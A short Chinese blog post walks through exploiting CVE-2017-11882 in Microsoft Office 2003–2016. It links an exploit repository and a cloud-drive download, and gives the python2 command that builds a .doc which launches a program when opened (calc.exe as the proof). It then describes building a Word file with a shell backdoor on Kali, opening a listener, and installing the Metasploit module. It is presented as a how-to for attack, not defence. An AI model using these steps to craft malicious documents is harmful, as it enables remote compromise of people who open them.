CVE-2017-11882 通杀所有office版本
2019-09-17 本文已影响0人
原来是老王
影响版本:
office 2003
office 2007
office 2010
office 2013
office 2016
工具
https://github.com/Ridter/CVE-2017-11882/
链接: https://pan.baidu.com/s/1wkQ3WXps24D6_RB-jW5mLw 提取码: vd99
实验流程
生成word文档test.doc,打开doc文件之后,会弹出计算器(以此验证offce漏洞)
python2 Command43b_CVE-2017-11882.py -c "cmd.exe /c calc.exe" -o test.doc
在Kali Linux上构造带有shell后门的word文件,并开启监听
CVE-2017-11882.rb和ms17-010.rb放一起吧。
ms17-010.rb文件的路径是:/usr/share/metasploit-framework/modules/exploits/windows/smb/ms17-010.rb,把CVE-2017-11882.rb放smb下面,和ms17-010在一起。
